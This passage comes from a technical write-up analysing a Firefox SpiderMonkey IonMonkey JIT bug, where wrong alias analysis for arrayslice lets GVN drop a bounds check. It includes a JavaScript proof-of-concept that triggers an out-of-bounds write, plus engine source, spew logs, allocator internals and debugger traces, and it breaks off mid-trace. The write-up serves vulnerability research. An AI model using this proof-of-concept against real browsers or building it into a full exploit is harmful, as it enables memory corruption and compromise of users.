}
};

class MArrayJoin : public MBinaryInstruction,
public MixPolicy<ObjectPolicy<0>, StringPolicy<1>>::Data {
@@ -9660,17 +9657,18 @@ class MCallGetProperty : public MUnaryIn
// Constructors need to perform a GetProp on the function prototype.
// Since getters cannot be set on the prototype, fetching is non-effectful.
// The operation may be safely repeated in case of bailout.
void setIdempotent() { idempotent_ = true; }
AliasSet getAliasSet() const override {
if (!idempotent_) {
return AliasSet::Store(AliasSet::Any);
}
-    return AliasSet::None();
+    return AliasSet::Load(AliasSet::ObjectFields | AliasSet::FixedSlot |
+                          AliasSet::DynamicSlot);
}
bool possiblyCalls() const override { return true; }
bool appendRoots(MRootList& roots) const override {
return roots.append(name_);
}
};

// Inline call to handle lhs[rhs]. The first input is a Value so that this


The instructions that don't define any refinements inherit the default behavior from js::jit::MDefinition::getAliasSet (both jit::MInstruction and jit::MPhi nodes inherit jit::MDefinition):

virtual AliasSet getAliasSet() const {
// Instructions are effectful by default.
return AliasSet::Store(AliasSet::Any);
}


Just one more thing before getting back into Ion; here is the PoC file I use if you would like to follow along at home:

let Trigger = false;
let Arr = null;
let Spray = [];

function Target(Special, Idx, Value) {
Arr[Idx] = 0x41414141;
Special.slice();
Arr[Idx] = Value;
}

class SoSpecial extends Array {
static get [Symbol.species]() {
return function() {
if(!Trigger) {
return;
}

Arr.length = 0;
gc();
};
}
};

function main() {
const Snowflake = new SoSpecial();
Arr = new Array(0x7e);
for(let Idx = 0; Idx < 0x400; Idx++) {
Target(Snowflake, 0x30, Idx);
}

Trigger = true;
Target(Snowflake, 0x20, 0xBBBBBBBB);
}

main();


It’s usually a good idea to compare the behavior of the patched component before and after the fix. The below shows the summary of the alias analysis pass without the fix and with it (alias-sum spew channel):

Non patched:
[AliasSummaries] Dependency list for other passes:
[AliasSummaries]  slots13 marked depending on start6
[AliasSummaries]  loadslot14 marked depending on start6
[AliasSummaries]  elements17 marked depending on start6
[AliasSummaries]  initializedlength18 marked depending on start6
[AliasSummaries]  elements25 marked depending on start6
[AliasSummaries]  arraylength26 marked depending on start6
[AliasSummaries]  slots29 marked depending on start6
[AliasSummaries]  loadslot30 marked depending on start6
[AliasSummaries]  elements32 marked depending on start6
[AliasSummaries]  initializedlength33 marked depending on start6

Patched:
[AliasSummaries] Dependency list for other passes:
[AliasSummaries]  slots13 marked depending on start6
[AliasSummaries]  loadslot14 marked depending on start6
[AliasSummaries]  elements17 marked depending on start6
[AliasSummaries]  initializedlength18 marked depending on start6
[AliasSummaries]  elements25 marked depending on start6
[AliasSummaries]  arraylength26 marked depending on start6
[AliasSummaries]  slots29 marked depending on arrayslice27
[AliasSummaries]  loadslot30 marked depending on arrayslice27
[AliasSummaries]  elements32 marked depending on arrayslice27
[AliasSummaries]  initializedlength33 marked depending on arrayslice27


What you quickly notice is that in the fixed version there are a bunch of new load / store dependencies against the .slice statement (which translates to an arrayslice MIR instruction). As we can see in the fix for this issue, the developer basically disabled any alias set refinement and basically opt-ed out the arrayslice instruction off the alias analysis. If we take a look at the MIR graph of the Target function on a vulnerable build that is what we see (on pass#9 Alias analysis and on pass#10 GVN):

Let's first start with what the MIR graph looks like after the Alias Analysis pass. The code is pretty straight-forward to go through and is basically broken down into three pieces as the original JavaScript code:

• The first step is to basically load up the Arr variable, converts the index Idx into an actual integer (tonumberint32), gets the length (it's not quite the length but it doesn't matter for now) of the array (initializedLength) and finally ensures that the index is within Arr's bounds.
• Then, it invokes the slice operation (arrayslice) against the Special array passed in the first argument of the function.
• Finally, like in the first step we have another set of instructions that basically do the same but this time to write a different value (passed in the third argument of the function).

This sounds like a pretty fair translation from the original code. Now, let's focus on the arrayslice instruction for a minute. In the previous section we have looked at what the Alias Analysis does and how it does it. In this case, if we look at the set of instructions coming after the 27 | arrayslice unbox9:Object constant24:Int32 arraylength26:Int32 we do not see another instruction that loads anything related to the unbox9:Object and as a result it means all those other instructions have no dependency to the slice operation. In the fixed version, even though we get the same MIR code, because the alias set for the arrayslice instruction is now Store(Any) combined with the fact that GetObject instead of grabbing its first operand it returns null, this makes genericMightAlias returns Alias::MayAlias. If the engine cannot prove no aliasing then it stays conservative and creates a dependency. That’s what explains this part in the alias-sum channel for the fixed version:

...
[AliasSummaries]  slots29 marked depending on arrayslice27
[AliasSummaries]  loadslot30 marked depending on arrayslice27
[AliasSummaries]  elements32 marked depending on arrayslice27
[AliasSummaries]  initializedlength33 marked depending on arrayslice27


Now looking at the graph after the GVN pass has executed we can start to see that the graph has been simplified / modified. One of the things that sounds pretty natural, is to basically eliminate a good part of the green block as it is mostly a duplicate of the blue block, and as a result only the storeelement instruction is conserved. This is safe based on the assumption that Arr cannot be changed in between. Less code, one bound check instead of two is also a good thing for code size and runtime performance which is Ion's ultimate goal.

At first sight, this might sound like a good and safe thing to do. JavaScript being JavaScript though, it turns out that if an attacker subclasses Array and provides an implementation for [Symbol.Species], it can redefine the ctor of the Array object. That coupled with the fact that slicing a JavaScript array results in a newly built array, you get the opportunity to do badness here. For example, we can set Arr's length to zero and because the bounds check happens only at the beginning of the function, we can modify its length after the 19 | boundscheck and before 36 | storeelement. If we do that, 36 effectively gives us the ability to write an Int32 out of Arr's bounds. Beautiful.

Implementing what is described above is pretty easy and here is the code for it:

let Trigger = false;
class SoSpecial extends Array {
static get [Symbol.species]() {
return function() {
if(!Trigger) {
return;
}

Arr.length = 0;
};
}
};


The Trigger variable allows us to control the behavior of SoSpecial's ctor and decide when to trigger the resizing of the array.

One important thing that we glossed over in this section is the relationship between the alias analysis results and how those results are consumed by the GVN pass. So as usual, let’s pop the hood and have a look at what actually happens :).

Global Value Numbering

The pass that follows Alias Analysis in Ion’s pipeline is the Global Value Numbering. (abbreviated GVN) which is implemented in the ValueNumbering.cpp file:

  // Optimize the graph, performing expression simplification and
// canonicalization, eliminating statically fully-redundant expressions,
// deleting dead instructions, and removing unreachable blocks.
MOZ_MUST_USE bool run(UpdateAliasAnalysisFlag updateAliasAnalysis);


The interesting part in this comment for us is the eliminating statically fully-redundant expressions part because what if we can have it incorrectly eliminate a supposedly redundant bounds check for example?

The pass itself isn’t as small as the alias analysis and looks more complicated. So we won’t follow the algorithm line by line like above but instead I am just going to try to give you an idea of the type of modification of the graph it can do. And more importantly, how does it use the dependencies established in the previous pass. We are lucky because this optimization pass is the only pass documented on Mozilla’s wiki which is great as it’s going to simplify things for us: IonMonkey/Global value numbering.

By reading the wiki page we learn a few interesting things. First, each instruction is free to opt-into GVN by providing an implementation for congruentTo and foldsTo. The default implementations of those functions are inherited from js::jit::MDefinition:

virtual bool congruentTo(const MDefinition* ins) const { return false; }
MDefinition* MDefinition::foldsTo(TempAllocator& alloc) {
// In the default case, there are no constants to fold.
return this;
}


The congruentTo function evaluates if the current instruction is identical to the instruction passed in argument. If they are it means one can be eliminated and replaced by the other one. The other one gets discarded and the MIR code gets smaller and simpler. This is pretty intuitive and easy to understand. As the name suggests, the foldsTo function is commonly used (but not only) for constant folding in which case it computes and creates a new MIR node that it returns. In default case, the implementation returns this which doesn’t change the node in the graph.

Another good source of help is to turn on the gvn spew channel which is useful to follow the code and what it does; here’s what it looks like:

[GVN] Running GVN on graph (with 1 blocks)
[GVN]   Visiting dominator tree (with 1 blocks) rooted at block0 (normal entry block)
[GVN]     Visiting block0
[GVN]       Recording Constant4
[GVN]       Replacing Constant5 with Constant4
[GVN]       Replacing Constant8 with Constant4
[GVN]       Recording Unbox9
[GVN]       Recording Unbox10
[GVN]       Recording Unbox11
[GVN]       Recording Constant12
[GVN]       Recording Slots13
[GVN]       Recording Constant15
[GVN]       Folded ToNumberInt3216 to Unbox10
[GVN]       Recording Elements17
[GVN]       Recording InitializedLength18
[GVN]       Recording BoundsCheck19
[GVN]       Recording Constant24
[GVN]       Recording Elements25
[GVN]       Recording ArrayLength26
[GVN]       Replacing Constant28 with Constant12
[GVN]       Replacing Slots29 with Slots13
[GVN]       Folded ToNumberInt3231 to Unbox10
[GVN]       Replacing Elements32 with Elements17
[GVN]       Replacing InitializedLength33 with InitializedLength18
[GVN]       Replacing BoundsCheck34 with BoundsCheck19
[GVN]       Recording Box37


At a high level, the pass iterates through the various instructions of our block and looks for opportunities to eliminate redundancies (congruentTo) and folds expressions (foldsTo). The logic that decides if two instructions are equivalent is in js::jit::ValueNumberer::VisibleValues::ValueHasher::match:

// Test whether two MDefinitions are congruent.
bool ValueNumberer::VisibleValues::ValueHasher::match(Key k, Lookup l) {
// If one of the instructions depends on a store, and the other instruction
// does not depend on the same store, the instructions are not congruent.
if (k->dependency() != l->dependency()) {
return false;
}
bool congruent =
k->congruentTo(l);  // Ask the values themselves what they think.
#ifdef JS_JITSPEW
if (congruent != l->congruentTo(k)) {
JitSpew(
JitSpew_GVN,
"      congruentTo relation is not symmetric between %s%u and %s%u!!",
k->opName(), k->id(), l->opName(), l->id());
}
#endif
return congruent;
}


Before invoking the instructions’ congruentTo implementation the algorithm verifies if the two instructions share the same dependency. This is this very line that ties together the alias analysis result and the global value numbering optimization; pretty exciting uh :)?.

To understand what is going on well we need two things: the alias summary spew to see the dependencies and the MIR code before the GVN pass has run. Here is the alias summary spew from vulnerable version:

Non patched:
[AliasSummaries] Dependency list for other passes:
[AliasSummaries]  slots13 marked depending on start6
[AliasSummaries]  loadslot14 marked depending on start6
[AliasSummaries]  elements17 marked depending on start6
[AliasSummaries]  initializedlength18 marked depending on start6
[AliasSummaries]  elements25 marked depending on start6
[AliasSummaries]  arraylength26 marked depending on start6
[AliasSummaries]  slots29 marked depending on start6
[AliasSummaries]  loadslot30 marked depending on start6
[AliasSummaries]  elements32 marked depending on start6
[AliasSummaries]  initializedlength33 marked depending on start6


And here is the MIR code:

On this diagram I have highlighted the two code regions that we care about. Those two regions are the same which makes sense as they are the MIR code generated by the two statements Arr[Idx] = .. / Arr[Idx] = .... The GVN algorithm iterates through the instructions and eventually evaluates the first 19 | boundscheck instruction. Because it has never seen this expression it records it in case it encounters a similar one in the future. If it does, it might choose to replace one instruction with the other. And so it carries on and eventually hit the other 34 | boundscheck instruction. At this point, it wants to know if 19 and 34 are congruent and the first step to determine that is to evaluate if those two instructions share the same dependency. In the vulnerable version, as you can see in the alias summary spew, those instructions have all the same dependency to start6 which the check is satisfied. The second step is to invoke MBoundsCheck implementation of congruentTo that ensures the two instructions are the same.

  bool congruentTo(const MDefinition* ins) const override {
if (!ins->isBoundsCheck()) {
return false;
}
const MBoundsCheck* other = ins->toBoundsCheck();
if (minimum() != other->minimum() || maximum() != other->maximum()) {
return false;
}
if (fallible() != other->fallible()) {
return false;
}
return congruentIfOperandsEqual(other);
}


Because the algorithm has already ran on the previous instructions, it has already replaced 28 to 33 by 12 to 18. Which means as far as congruentTo is concerned the two instructions are the same and it is safe for Ion to remove 35 and only have one boundscheck instruction in this function. You can also see this in the GVN spew below that I edited just to show the relevant parts:

[GVN] Running GVN on graph (with 1 blocks)
[GVN]   Visiting dominator tree (with 1 blocks) rooted at block0 (normal entry block)
[GVN]     Visiting block0
...
[GVN]       Recording Constant12
[GVN]       Recording Slots13
[GVN]       Recording Constant15
[GVN]       Folded ToNumberInt3216 to Unbox10
[GVN]       Recording Elements17
[GVN]       Recording InitializedLength18
[GVN]       Recording BoundsCheck19

…

[GVN]       Replacing Constant28 with Constant12

[GVN]       Replacing Slots29 with Slots13

[GVN]       Folded ToNumberInt3231 to Unbox10

[GVN]       Replacing Elements32 with Elements17

[GVN]       Replacing InitializedLength33 with InitializedLength18

[GVN]       Replacing BoundsCheck34 with BoundsCheck19



Wow, we did it: from the alias analysis to the GVN and followed along the redundancy elimination.

Now if we have a look at the alias summary spew for a fixed version of Ion this is what we see:

Patched:
[AliasSummaries] Dependency list for other passes:
[AliasSummaries]  slots13 marked depending on start6
[AliasSummaries]  loadslot14 marked depending on start6
[AliasSummaries]  elements17 marked depending on start6
[AliasSummaries]  initializedlength18 marked depending on start6
[AliasSummaries]  elements25 marked depending on start6
[AliasSummaries]  arraylength26 marked depending on start6
[AliasSummaries]  slots29 marked depending on arrayslice27
[AliasSummaries]  loadslot30 marked depending on arrayslice27
[AliasSummaries]  elements32 marked depending on arrayslice27
[AliasSummaries]  initializedlength33 marked depending on arrayslice27


In this case, the two regions of code have a different dependency; the first block depends on start6 as above, but the second is now dependent on arrayslice27. This makes instructions not congruent and this is the very thing that prevents GVN from replacing the second region by the first one :).

Reaching state of no unknowns

Now that we finally understand what is going on, let's keep pushing until we reach what I call the state of no unknowns. What I mean by that is simply to be able to explain every little detail of the PoC and be in full control of it.

And at the end of the day, there is no magic. It's just code and the truth is out there :).

At this point this is the PoC I am trying to demystify a bit more (if you want to follow along) this is the one:

let Trigger = false;
let Arr = null;

function Target(Special, Idx, Value) {
Arr[Idx] = 0x41414141;
Special.slice();
Arr[Idx] = Value;
}

class SoSpecial extends Array {
static get [Symbol.species]() {
return function() {
if(!Trigger) {
return;
}

Arr.length = 0;
gc();
};
}
};

function main() {
const Snowflake = new SoSpecial();
Arr = new Array(0x7e);
for(let Idx = 0; Idx < 0x400; Idx++) {
Target(Snowflake, 0x30, Idx);
}

Trigger = true;
Target(Snowflake, 0x20, 0xBB);
}

main();


In the following sections we walk through various aspects of the PoC, SpiderMonkey and IonMonkey internals in order to gain an even better understanding of all the behaviors at play here. It might be only < 100 lines of code but a lot of things happen :).

Phew, you made it here! I guess it is a good point where people that were only interested in the root-cause of this issue can stop reading: we have shed enough light on the vulnerability and its roots. For the people that want more though, and that still have a lot of questions like 'why is this working and this is not', 'why is it not crashing reliably' or 'why does this line matters' then fasten your seat belt and let's go!

The Nursery

The first stop is to explain in more detail how one of the three heap allocators in Spidermonkey works: the Nursery.

The Nursery is actually, for once, a very simple allocator. It is useful and important to know how it is designed as it gives you natural answers to the things it is able to do and the thing it cannot (by design).

The Nursery is specific to a JSRuntime and by default has a maximum size of 16MB (you can tweak the size with --nursery-size with the JavaScript shell js.exe). The memory is allocated by VirtualAlloc (by chunks of 0x100000 bytes PAGE_READWRITE memory) in js::gc::MapAlignedPages and here is an example call-stack:

 # Call Site
00 KERNELBASE!VirtualAlloc
01 js!js::gc::MapAlignedPages
02 js!js::gc::GCRuntime::getOrAllocChunk
03 js!js::Nursery::init
04 js!js::gc::GCRuntime::init
05 js!JSRuntime::init
06 js!js::NewContext
07 js!main


This contiguous region of memory is called a js::NurseryChunk and the allocator places such a structure there. The js::NurseryChunk starts with the actual usable space for allocations and has a trailer metadata at the end:

const size_t ChunkShift = 20;
const size_t ChunkSize = size_t(1) << ChunkShift;

const size_t ChunkTrailerSize = 2 * sizeof(uintptr_t) + sizeof(uint64_t);

static const size_t NurseryChunkUsableSize =
gc::ChunkSize - gc::ChunkTrailerSize;

struct NurseryChunk {
char data[Nursery::NurseryChunkUsableSize];
gc::ChunkTrailer trailer;

static NurseryChunk* fromChunk(gc::Chunk* chunk);
void poisonAndInit(JSRuntime* rt, size_t extent = ChunkSize);
void poisonAfterSweep(size_t extent = ChunkSize);
uintptr_t start() const { return uintptr_t(&data); }
uintptr_t end() const { return uintptr_t(&trailer); }
gc::Chunk* toChunk(JSRuntime* rt);
};


Every js::NurseryChunk is 0x100000 bytes long (on x64) or 256 pages total and has effectively 0xffe8 usable bytes (the rest is metadata). The allocator purposely tries to fragment those region in the virtual address space of the process (in x64) and so there is not a specific offset in between all those chunks.

The way allocations are organized in this region is pretty easy: say the user asks for a 0x30 bytes allocation, the allocator returns the current position for backing the allocation and the allocator simply bumps its current location by +0x30. The biggest allocation request that can go through the Nursery is 1024 bytes long (defined by js::Nursery::MaxNurseryBufferSize) and if it exceeds this size usually the allocation is serviced from the jemalloc heap (which is the third heap in Firefox: Nursery, Tenured and jemalloc).

When a chunk is full, the Nursery can allocate another one if it hasn't reached its maximum size yet; if it hasn't it sets up a new js::NurseryChunk (as in the above call-stack) and update the current one with the new one. If the Nursery has reached its maximum capacity it triggers a minor garbage collection which collects the objects that needs collection (the one having no references anymore) and move all the objects still alive on the Tenured heap. This gives back a clean slate for the Nursery.

Even though the Nursery doesn't keep track of the various objects it has allocated and because they are all allocated contiguously the runtime is basically able to iterate over the objects one by one and sort out the boundary of the current object and moves to the next. Pretty cool.

While writing up this section I also added a new utility command in sm.js called !in_nursery <addr> that tells you if addr belongs to the Nursery or not. On top of that, it shows you interesting information about its internal state. This is what it looks like:

0:008> !in_nursery 0x19767e00df8
Using previously cached JSContext @0x000001fe17318000
0x000001fe1731cde8: js::Nursery
ChunkCountLimit: 0x0000000000000010 (16 MB)
Capacity: 0x0000000000fffe80 bytes
CurrentChunk: 0x0000019767e00000
Position: 0x0000019767e00eb0
Chunks:
00: [0x0000019767e00000 - 0x0000019767efffff]
01: [0x00001fa2aee00000 - 0x00001fa2aeefffff]
02: [0x0000115905000000 - 0x00001159050fffff]
03: [0x00002fc505200000 - 0x00002fc5052fffff]
04: [0x000020d078700000 - 0x000020d0787fffff]
05: [0x0000238217200000 - 0x00002382172fffff]
06: [0x00003ff041f00000 - 0x00003ff041ffffff]
07: [0x00001a5458700000 - 0x00001a54587fffff]
-------
0x19767e00df8 has been found in the js::NurseryChunk @0x19767e00000!


Understanding what happens to Arr

The first thing that was bothering me is the very specific number of items the array is instantiated with:

Arr = new Array(0x7e);


People following at home will also notice that modifying this constant takes us from a PoC that crashes reliably to... a PoC that may not even crash anymore.

Let's start at the beginning and gather information. This is an array that gets allocated in the Nursery (also called DefaultHeap) with the OBJECT2_BACKGROUND kind which means it is 0x30 bytes long - basically just enough to pack a js::NativeObject (0x20 bytes) as well as a js::ObjectElements (0x10 bytes):

0:000> ?? sizeof(js!js::NativeObject) + sizeof(js!js::ObjectElements)
unsigned int64 0x30

0:000> r
js!js::AllocateObject<js::CanGC>:

0:000> ?? kind
js::gc::AllocKind OBJECT2_BACKGROUND (0n5)

0:000> x js!js::gc::Arena::ThingSizes
00007ff788133fe0 js!js::gc::Arena::ThingSizes = <no type information>

0:000> dds 00007ff788133fe0 + (5 * 4) l1
00007ff788133ff4  00000030

0:000> kc
# Call Site
00 js!js::AllocateObject<js::CanGC>
01 js!js::ArrayObject::createArray
02 js!NewArrayTryUseGroup<2046>
03 js!ArrayConstructorImpl
04 js!js::ArrayConstructor
05 js!InternalConstruct
06 js!Interpret
07 js!js::RunScript
08 js!js::ExecuteKernel
09 js!js::Execute
0a js!JS_ExecuteScript
0b js!Process
0c js!main
0d js!__scrt_common_main_seh


You might be wondering where is the space for the 0x7e elements though? Well, once the shell of the object is constructed, it grows the elements_ space to be able to store that many elements. The number of elements is being adjusted in js::NativeObject::goodElementsAllocationAmount to 0x80 (which is coincidentally the biggest allocation that the Nursery can service as we've seen in the previous section: 0x400 bytes)) and then js::NativeObject::growElements calls into the Nursery allocator to allocate 0x80 * sizeof(JS::Value) = 0x400 bytes:

0:000>
js!js::NativeObject::goodElementsAllocationAmount+0x264:
00007ff6e5dbfae4 418909          mov     dword ptr [r9],ecx ds:00000028cc9fe9ac=00000000

0:000> r @ecx
ecx=80

0:000> kc
# Call Site
00 js!js::NativeObject::goodElementsAllocationAmount
01 js!js::NativeObject::growElements
02 js!NewArrayTryUseGroup<2046>
03 js!ArrayConstructorImpl
04 js!js::ArrayConstructor
05 js!InternalConstruct
06 js!Interpret
07 js!js::RunScript
08 js!js::ExecuteKernel
09 js!js::Execute
0a js!JS_ExecuteScript
0b js!Process
0c js!main

...

0:000> t
js!js::Nursery::allocateBuffer:
00007ff6e6029c70 4156            push    r14

0:000> r @r8
r8=0000000000000400

0:000> kc
# Call Site
00 js!js::Nursery::allocateBuffer
01 js!js::NativeObject::growElements
02 js!NewArrayTryUseGroup<2046>
03 js!ArrayConstructorImpl
04 js!js::ArrayConstructor
05 js!InternalConstruct
06 js!Interpret
07 js!js::RunScript
08 js!js::ExecuteKernel
09 js!js::Execute
0a js!JS_ExecuteScript
0b js!Process
0c js!main


Once the allocation is done, it copies the old elements_ content into the new one, updates the Array object and we are done with our Array:

0:000> dt js::NativeObject @r14 elements_
+0x018 elements_        : 0x000000c9ffb000f0 js::HeapSlot

0:000> dqs @r14
000000c9ffb000b0  00002bf2fa07deb0
000000c9ffb000b8  00002bf2fa0987e8
000000c9ffb000c0  0000000000000000
000000c9ffb000c8  000000c9ffb000f0
000000c9ffb000d0  0000000000000000 <- Lost / unused space
000000c9ffb000d8  0000007e00000000 <- Lost / unused space
000000c9ffb000e0  0000000000000000
000000c9ffb000e8  0000007e0000007e

000000c9ffb000f0  2f2f2f2f2f2f2f2f
000000c9ffb000f8  2f2f2f2f2f2f2f2f
000000c9ffb00100  2f2f2f2f2f2f2f2f
000000c9ffb00108  2f2f2f2f2f2f2f2f
000000c9ffb00110  2f2f2f2f2f2f2f2f
000000c9ffb00118  2f2f2f2f2f2f2f2f
000000c9ffb00120  2f2f2f2f2f2f2f2f
000000c9ffb00128  2f2f2f2f2f2f2f2f


One small remark is that because we first allocated 0x30 bytes, we originally had the js::ObjectElements at 000000c9ffb000d0. Because we needed a bigger space, we allocated space for 0x7e elements and two more JS::Value (in size) to be able to store the new js::ObjectElements (this object is always right before the content of the array). The result of this is the old js::ObjectElements at 000000c9ffb000d0/8 is now unused / lost space; which is kinda fun I suppose :).

This is also very similar to what happens when we trigger the Arr.length = 0 statement; the Nursery allocator is invoked to replace the to-be-shrunk elements_ array. This is implemented in js::NativeObject::shrinkElements. This time 8 (which is the minimum and is defined as js::NativeObject::SLOT_CAPACITY_MIN) is returned by js::NativeObject::goodElementsAllocationAmount which results in an allocation request of 8*8=0x40 bytes from the Nursery. js::Nursery::reallocateBuffer decides that this is a no-op because the new size (0x40) is smaller than the old one (0x400) and because the chunk is backed by a Nursery buffer:

void* js::Nursery::reallocateBuffer(JSObject* obj, void* oldBuffer,
size_t oldBytes, size_t newBytes) {
// ...
/* The nursery cannot make use of the returned slots data. */
if (newBytes < oldBytes) {
return oldBuffer;
}
// ...
}


And as a result, our array basically stays the same; only the js::ObjectElement part is updated:

0:000> !smdump_jsobject 0x00000c9ffb000b0
c9ffb000b0: js!js::ArrayObject:            Length: 0 <- Updated length
c9ffb000b0: js!js::ArrayObject:          Capacity: 6 <- This is js::NativeObject::SLOT_CAPACITY_MIN - js::ObjectElements::VALUES_PER_HEADER
c9ffb000b0: js!js::ArrayObject: InitializedLength: 0
c9ffb000b0: js!js::ArrayObject:           Content: []
@$smdump_jsobject(0x00000c9ffb000b0) 0:000> dt js::NativeObject 0x00000c9ffb000b0 elements_ +0x018 elements_ : 0x000000c9ffb000f0 js::HeapSlot  Now if you think about it we are able to store arbitrary values in out-of-bounds memory. We fully control the content, and we somewhat control the offset (up to the size of the initial array). But how can we overwrite actually useful data? Sure we can make sure to have our array followed by something interesting. Although,if you think about it, we will shrink back the array length to zero and then trigger the vulnerability. Well, by design the object we placed behind us is not reachable by our index because it was precisely adjacent to the original array. So this is not enough and we need to find a way to have the shrunken array being moved into a region where it gets adjacent with something interesting. In this case we will end up with interesting corruptible data in the reach of our out-of-bounds. A minor-gc should do the trick as it walks the Nursery, collects the objects that needs collection and moves all the other ones to the Tenured heap. When this happens, it is fair to guess that we get moved to a memory chunk that can just fit the new object. Code generation with IonMonkey Before beginning, one thing that you might have been wondering at this point is where do we actually check the implementation of the code generation for a given LIR instruction? (MIR gets lowered to LIR and code-generation kicks in to generate native code) Like how does storeelement get lowered to native code (does MIR storeelement get translated to LIR LStoreElement instruction?) This would be useful for us to know a bit more about the out-of-bounds memory access we can trigger. You can find those details in what is called the CodeGenerator which lives in src/jit/CodeGenerator.cpp. For example, you can quickly see that most of the code generation related to the arrayslice instruction happens in js::ArraySliceDense: void CodeGenerator::visitArraySlice(LArraySlice* lir) { Register object = ToRegister(lir->object()); Register begin = ToRegister(lir->begin()); Register end = ToRegister(lir->end()); Register temp1 = ToRegister(lir->temp1()); Register temp2 = ToRegister(lir->temp2()); Label call, fail; // Try to allocate an object. TemplateObject templateObject(lir->mir()->templateObj()); masm.createGCObject(temp1, temp2, templateObject, lir->mir()->initialHeap(), &fail); // Fixup the group of the result in case it doesn't match the template object. masm.copyObjGroupNoPreBarrier(object, temp1, temp2); masm.jump(&call); { masm.bind(&fail); masm.movePtr(ImmPtr(nullptr), temp1); } masm.bind(&call); pushArg(temp1); pushArg(end); pushArg(begin); pushArg(object); using Fn = JSObject* (*)(JSContext*, HandleObject, int32_t, int32_t, HandleObject); callVM<Fn, ArraySliceDense>(lir); }  Most of the MIR instructions translate one-to-one to a LIR instruction (MIR instructions start with an M like MStoreElement, and LIR instruction starts with an L like LStoreElement); there are about 309 different MIR instructions (see objdir/js/src/jit/MOpcodes.h) and 434 LIR instructions (see objdir/js/src/jit/LOpcodes.h). The function jit::CodeGenerator::visitArraySlice function is directly invoked from js::jit::CodeGenerator in a switch statement dispatching every LIR instruction to its associated handler (note that I have cleaned-up the function below by removing a bunch of useless ifdef blocks for our investigation): bool CodeGenerator::generateBody() { JitSpew(JitSpew_Codegen, "==== BEGIN CodeGenerator::generateBody ====\n"); IonScriptCounts* counts = maybeCreateScriptCounts(); for (size_t i = 0; i < graph.numBlocks(); i++) { current = graph.getBlock(i); // Don't emit any code for trivial blocks, containing just a goto. Such // blocks are created to split critical edges, and if we didn't end up // putting any instructions in them, we can skip them. if (current->isTrivial()) { continue; } masm.bind(current->label()); mozilla::Maybe<ScriptCountBlockState> blockCounts; if (counts) { blockCounts.emplace(&counts->block(i), &masm); if (!blockCounts->init()) { return false; } } TrackedOptimizations* last = nullptr; for (LInstructionIterator iter = current->begin(); iter != current->end(); iter++) { if (!alloc().ensureBallast()) { return false; } if (counts) { blockCounts->visitInstruction(*iter); } if (iter->mirRaw()) { // Only add instructions that have a tracked inline script tree. if (iter->mirRaw()->trackedTree()) { if (!addNativeToBytecodeEntry(iter->mirRaw()->trackedSite())) { return false; } } // Track the start native offset of optimizations. if (iter->mirRaw()->trackedOptimizations()) { if (last != iter->mirRaw()->trackedOptimizations()) { DumpTrackedSite(iter->mirRaw()->trackedSite()); DumpTrackedOptimizations(iter->mirRaw()->trackedOptimizations()); last = iter->mirRaw()->trackedOptimizations(); } if (!addTrackedOptimizationsEntry( iter->mirRaw()->trackedOptimizations())) { return false; } } } setElement(*iter); // needed to encode correct snapshot location. switch (iter->op()) { #ifndef JS_CODEGEN_NONE # define LIROP(op) \ case LNode::Opcode::op: \ visit##op(iter->to##op()); \ break; LIR_OPCODE_LIST(LIROP) # undef LIROP #endif case LNode::Opcode::Invalid: default: MOZ_CRASH("Invalid LIR op"); } // Track the end native offset of optimizations. if (iter->mirRaw() && iter->mirRaw()->trackedOptimizations()) { extendTrackedOptimizationsEntry(iter->mirRaw()->trackedOptimizations()); } } if (masm.oom()) { return false; } } JitSpew(JitSpew_Codegen, "==== END CodeGenerator::generateBody ====\n"); return true; }  After theory, let's practice a bit and try to apply all of this learning against the PoC file. Here is what I would like us to do: let's try to break into the assembly code generated by Ion for the function Target. Then, let's find the boundscheck so that we can trace forward and witness every step of the bug: 1. Check Idx against the initializedLength of the array 2. Storing the integer 0x41414141 inside the array's elements_ memory space 3. Calling slice on Special and making sure the size of Arr has been shrunk and that it is now 0 4. Finally, witnessing the out-of-bounds store Before diving in, here is the code that generates the assembly code for the boundscheck instruction: void CodeGenerator::visitBoundsCheck(LBoundsCheck* lir) { const LAllocation* index = lir->index(); const LAllocation* length = lir->length(); LSnapshot* snapshot = lir->snapshot(); if (index->isConstant()) { // Use uint32 so that the comparison is unsigned. uint32_t idx = ToInt32(index); if (length->isConstant()) { uint32_t len = ToInt32(lir->length()); if (idx < len) { return; } bailout(snapshot); return; } if (length->isRegister()) { bailoutCmp32(Assembler::BelowOrEqual, ToRegister(length), Imm32(idx), snapshot); } else { bailoutCmp32(Assembler::BelowOrEqual, ToAddress(length), Imm32(idx), snapshot); } return; } Register indexReg = ToRegister(index); if (length->isConstant()) { bailoutCmp32(Assembler::AboveOrEqual, indexReg, Imm32(ToInt32(length)), snapshot); } else if (length->isRegister()) { bailoutCmp32(Assembler::BelowOrEqual, ToRegister(length), indexReg, snapshot); } else { bailoutCmp32(Assembler::BelowOrEqual, ToAddress(length), indexReg, snapshot); } }  According to the code above, we can expect to have a cmp instruction emitted with two registers: the index and the length, as well as a conditional branch for bailing out if the index is bigger than the length. In our case, one thing to keep in mind is that the length is the initializedLength of the array and not the actual length as you can see in the MIR code: 18 | initializedlength elements17:Elements 19 | boundscheck unbox10:Int32 initializedlength18:Int32  Now let's get back to observing the PoC in action. One easy way that I found to break in a function generated by Ion right before it adds the native code for a specific LIR instruction is to set a breakpoint in the code generator for the instruction of your choice (or on js::jit::CodeGenerator::generateBody if you want to break at the entry point of the function) and then modify its internal buffer in order to add an int3 in the generated code. This is another command that I added to sm.js called !ion_insertbp. Check Idx against the initializedLength of the array In our case, we are interested to break right before the boundscheck so let's set a breakpoint on js!js::jit::CodeGenerator::visitBoundsCheck, invoke !ion_insertbp and then we should be off to the races: 0:008> g Breakpoint 0 hit js!js::jit::CodeGenerator::visitBoundsCheck: 00007ff6e62de1a0 4156 push r14 0:000> !ion_insertbp unsigned char 0xcc '' unsigned int64 0xff @$ion_insertbp()

0:000> g
(224c.2914): Break instruction exception - code 80000003 (first chance)
0000035c97b8b299 cc              int     3

0:000> u . l2
0000035c97b8b299 cc              int     3
0000035c97b8b29a 3bd9            cmp     ebx,ecx

0:000> t
0000035c97b8b29a 3bd9            cmp     ebx,ecx

0:000> r.
ebx=0000000000000031  ecx=0000000000000030


Sweet; this cmp is basically the boundscheck instruction that compares the initializedLength (0x31) of the array (because we initialized Arr[0x30] a bunch of times when warming-up the JIT) to Idx which is 0x30. The index is in bounds and so the code doesn't bailout and keeps going forward.

Storing the integer 0x41414141 inside the array's elements_ memory space

If we trace a little further we can see the code generated that loads the integer 0x41414141 into the array at the index 0x30:

0:000>

0:000>
